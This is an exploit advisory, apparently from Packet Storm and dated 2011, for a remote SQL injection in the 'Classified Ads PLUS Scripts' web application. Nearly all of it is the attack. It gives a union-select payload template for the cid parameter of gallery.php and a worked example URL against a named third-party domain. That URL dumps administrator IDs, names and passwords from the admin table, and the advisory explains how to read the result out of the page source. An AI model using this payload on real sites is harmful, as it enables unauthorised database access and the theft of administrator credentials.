Classified Ads PLUS Scripts suffers from a remote SQL injection vulnerability.
76cd61af88792e5af989b22c00354be0c479d994741324dc700f3c1486c7242e####################################################################
[+] Exploit Title : Classified Ads PLUS Scripts [ Sql Injection Vulnerability]
[+] Author : Egyptian.H4x0rz
[+] Contact : SpY(at)Hotmail.Com
[+] Date : 05-04-2011
[+] Software Link: https://www.softbizscripts.com/classified-ads-plus-script-features.php
[+] category: Web Apps [SQli]
[+] HomePage : Black-hat.cc
####################################################################
Vulnerability:
*SQL injection Vulnerability*
[#] https://patch/gallery.php?provided=14&cid=-1+union+select+,[sqli],2,3,4,5
~
[#] eXample
https://trocavecmoi.com/gallery.php?provided=14&cid=-1+union+select+concat_ws(0x3a,id,admin_name,pwd),2,3,4,5+from+sbclassified_admin--
[#] to view result open page source and find "showcategory.php?cid=xxxxxxxxxx"
####################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed